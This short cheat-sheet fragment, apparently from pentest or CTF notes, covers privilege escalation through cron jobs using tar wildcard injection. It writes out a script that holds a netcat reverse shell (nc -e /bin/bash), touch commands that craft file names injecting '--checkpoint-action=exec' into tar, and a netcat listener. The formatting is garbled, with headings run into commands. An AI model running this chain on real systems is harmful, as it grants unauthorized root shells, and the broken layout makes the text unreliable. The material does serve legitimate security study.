2️⃣ 2⃣ 2⃣ Cron Jobs
Find a file
find / -name 3Code to connect to local port 1234 using netcat
printf '#! /bin/bash\nnc -e /bin/bash 127.0.0.1 1234' > shell.shSpecially crafted files to trigger shell.sh from tar
touch -- '--checkpoint-action=exec=sh shell.sh'
touch -- '--checkpoint=1'Start a netcat listener
nc -nvlp 1234Last updated